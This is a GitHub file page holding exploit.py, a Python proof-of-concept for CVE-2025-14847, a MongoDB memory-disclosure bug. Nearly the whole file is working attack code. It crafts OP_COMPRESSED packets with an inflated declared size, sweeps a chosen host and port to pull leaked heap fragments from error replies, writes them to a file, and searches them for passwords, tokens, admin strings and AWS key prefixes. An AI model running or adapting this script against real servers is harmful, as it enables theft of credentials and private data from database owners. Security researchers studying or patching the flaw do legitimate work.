-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathexploit.py
More file actions
161 lines (129 loc) · 5.85 KB
/
exploit.py
File metadata and controls
161 lines (129 loc) · 5.85 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
import socket
import struct
import zlib
import re
import argparse
import slogsec
log = slogsec.get_logger("CVE-2025-14847")
def hexdump(data, length=16):
log.info(f"{'Offset':<10} {'Hex':<47} {'ASCII'}")
log.info("-" * 75)
for i in range(0, len(data), length):
chunk = data[i:i + length]
hex_part = " ".join(f"{b:02x}" for b in chunk)
ascii_part = "".join(chr(b) if 32 <= b <= 126 else "." for b in chunk)
log.info(f"{i:08x}: {hex_part:<47} |{ascii_part}|")
def build_malformed_packet(leak_size):
"""Construct a malicious OP_COMPRESSED packet."""
# 1. Prepare a valid original payload (OP_QUERY protocol)
# Query: {"isMaster": 1}
bson_payload = b'\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00'
# OP_QUERY Header: flags(0) + collection("admin.$cmd") + nToSkip(0) + nToReturn(-1)
op_query_header = struct.pack('<I', 0) + b'admin.$cmd\x00' + struct.pack('<ii', 0, -1)
original_msg = op_query_header + bson_payload
# 2. Normal compression of the original message
compressed_body = zlib.compress(original_msg)
# 3. Construct malicious OP_COMPRESSED fields
# Vulnerability core: fake_uncompressed_size is set to a huge value
# The server allocates heap memory based on this value, but the actual decompressed data is small,
# causing leftover memory blocks to be returned directly.
op_compressed_data = (
struct.pack('<I', 2004) + # originalOpcode: 2004 (OP_QUERY)
struct.pack('<I', leak_size) + # MALICIOUS: declare huge decompression length
b'\x02' + # compressorId: 2 (zlib)
compressed_body # actual compressed data
)
# 4. Construct standard message header MsgHeader (16 bytes)
request_id = random.randint(1000, 9999)
op_code = 2012 # 2012 represents OP_COMPRESSED
total_len = 16 + len(op_compressed_data)
header = struct.pack('<iiii', total_len, request_id, 0, op_code)
return header + op_compressed_data, request_id
def send_probe(host, port, doc_len, buffer_size):
"""Send crafted BSON with inflated document length"""
# Minimal BSON content - we lie about total length
content = b'\x10a\x00\x01\x00\x00\x00' # int32 a=1
bson = struct.pack('<i', doc_len) + content
# Wrap in OP_MSG
op_msg = struct.pack('<I', 0) + b'\x00' + bson
compressed = zlib.compress(op_msg)
# OP_COMPRESSED with inflated buffer size (triggers the bug)
payload = struct.pack('<I', 2013) # original opcode
payload += struct.pack('<i', buffer_size) # claimed uncompressed size
payload += struct.pack('B', 2) # zlib
payload += compressed
header = struct.pack('<IIII', 16 + len(payload), 1, 0, 2012)
try:
sock = socket.socket()
sock.settimeout(2)
sock.connect((host, port))
sock.sendall(header + payload)
response = b''
while len(response) < 4 or len(response) < struct.unpack('<I', response[:4])[0]:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
sock.close()
return response
except:
return b''
def extract_leaks(response):
"""Extract leaked data from error response"""
if len(response) < 25:
return []
try:
msg_len = struct.unpack('<I', response[:4])[0]
if struct.unpack('<I', response[12:16])[0] == 2012:
raw = zlib.decompress(response[25:msg_len])
else:
raw = response[16:msg_len]
except:
return []
leaks = []
# Field names from BSON errors
for match in re.finditer(rb"field name '([^']*)'", raw):
data = match.group(1)
if data and data not in [b'?', b'a', b'$db', b'ping']:
leaks.append(data)
# Type bytes from unrecognized type errors
for match in re.finditer(rb"type (\d+)", raw):
leaks.append(bytes([int(match.group(1)) & 0xFF]))
return leaks
def main():
parser = argparse.ArgumentParser(description='CVE-2025-14847 MongoDB Memory Leak')
parser.add_argument('--host', default='localhost', help='Target host')
parser.add_argument('--port', type=int, default=27017, help='Target port')
parser.add_argument('--min-offset', type=int, default=20, help='Min doc length')
parser.add_argument('--max-offset', type=int, default=8192, help='Max doc length')
parser.add_argument('--output', default='leaked.bin', help='Output file')
args = parser.parse_args()
log.info(f"[*] Target: {args.host}:{args.port}")
log.info(f"[*] Scanning offsets {args.min_offset}-{args.max_offset}")
all_leaked = bytearray()
unique_leaks = set()
for doc_len in range(args.min_offset, args.max_offset):
response = send_probe(args.host, args.port, doc_len, doc_len + 500)
leaks = extract_leaks(response)
for data in leaks:
if data not in unique_leaks:
unique_leaks.add(data)
all_leaked.extend(data)
# Show interesting leaks (> 10 bytes)
if len(data) > 10:
# Use hexdump to display the preview data in hex
hexdump(data[:80], length=16)
log.info(f"[+] offset={doc_len:4d} len={len(data):4d}:")
# Save results
with open(args.output, 'wb') as f:
f.write(all_leaked)
log.success(f"[*] Total leaked: {len(all_leaked)} bytes")
log.success(f"[*] Unique fragments: {len(unique_leaks)}")
log.success(f"[*] Saved to: {args.output}")
# Show any secrets found
secrets = [b'password', b'secret', b'key', b'token', b'admin', b'AKIA']
for s in secrets:
if s.lower() in all_leaked.lower():
print(f"[!] Found pattern: {s.decode()}")
if __name__ == '__main__':
main()